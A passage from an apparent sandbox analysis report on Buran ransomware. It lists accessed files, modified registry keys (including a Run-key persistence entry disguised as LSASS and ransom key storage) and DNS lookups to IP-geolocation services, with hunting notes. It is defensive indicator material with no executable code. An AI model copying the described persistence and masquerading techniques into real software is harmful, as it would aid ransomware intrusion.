1482 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security",
1483 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy",
1484 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar",
1485 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar",
1486 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar",
1487 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar",
1488 "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc",
1489 "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt",
1490 "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc",
1491 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt",
1492 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt",
1493 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml",
1494 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml",
1495 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf",
1496 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat",
1497 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat",
1498 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf",
1499 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini",
1500 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml",
1501 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd",
1502 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini",
1503 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd",
1504 "C:\\Program Files\\Notepad++\\contextMenu.xml",
1505 "C:\\Program Files\\Notepad++\\functionList.xml",
1506 "C:\\Program Files\\Notepad++\\langs.model.xml",
1507 "C:\\Program Files\\Notepad++\\LICENSE"
1508
1509
1510* Modified Registry Keys (note: the HKCU Run value named "Local Security Authority Subsystem Service" is a user-level persistence entry masquerading as the legitimate lsass component — a good hunting pivot, since genuine LSASS is never started from a Run key; "Software\\Buran V\\Service\\Public Key" and "\\Machine ID" look like per-victim key/ID storage used for the ransom note; the VSS\\Diag writer keys are consistent with shadow-copy manipulation; the "Terminal Server Client\\Servers" key suggests RDP connection history was touched — unconfirmed here; the Schedule\\TaskCache and Handshake entries are OS-maintained task-scheduler keys and may be background noise rather than sample-created):
1511 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service",
1512 "HKEY_CURRENT_USER\\Software\\Buran V\\Service",
1513 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Public Key",
1514 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Machine ID",
1515 "HKEY_CURRENT_USER\\Software\\Buran V\\Knock",
1516 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths",
1517 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths\\0",
1518 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
1519 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DA0ED248-9EDB-4144-B9E7-AFC1D00A662A",
1520 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
1521 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\A14B62F8-6D27-44D8-BFCB-66F44117F2A4",
1522 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
1523 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\4C64B42C-C15C-4AFB-9A31-7317BC95FE05",
1524 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\F7093373-6201-40B8-8D09-6E7E59E028EB",
1525 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Registry Writer",
1526 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\COM+ REGDB Writer",
1527 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\ASR Writer",
1528 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Shadow Copy Optimization Writer",
1529 "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers",
1530 "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\(Default)",
1531 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\DA0ED248-9EDB-4144-B9E7-AFC1D00A662A\\data",
1532 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\A14B62F8-6D27-44D8-BFCB-66F44117F2A4\\data",
1533 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\4C64B42C-C15C-4AFB-9A31-7317BC95FE05\\data",
1534 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\F7093373-6201-40B8-8D09-6E7E59E028EB\\data"
1535
1536
1537* Deleted Registry Keys: (none recorded in this run)
1538
1539* DNS Communications (A-record queries only; no answers were captured, so the lookups may have been sinkholed or unresolved in the sandbox. Both names are public IP-geolocation/IP-logging services, consistent with a victim geolocation check-in or beacon rather than attacker-owned infrastructure — treat them as low-confidence indicators):
1540
1541 "type": "A",
1542 "request": "geoiptool.com",
1543 "answers":
1544
1545
1546 "type": "A",
1547 "request": "iplogger.ru",
1548 "answers":
1549
1550
1551
1552* Domains (IPs as resolved at capture time; these belong to third-party services with shared hosting and may change, so alert on the domain plus the requesting process context rather than on the IP alone to avoid false positives):
1553
1554 "ip": "158.69.67.193",
1555 "domain": "geoiptool.com"
1556
1557
1558 "ip": "88.99.66.31",
1559 "domain": "iplogger.ru"
1560
1561
1562
1563* Network Communication - ICMP: (none captured in this run)
1564
1565* Network Communication - HTTP: (none captured in this run)
1566
1567* Network Communication - SMTP: (none captured in this run)
1568
1569* Network Communication - Hosts: (none captured in this run)
1570
1571* Network Communication - IRC: (none captured in this run)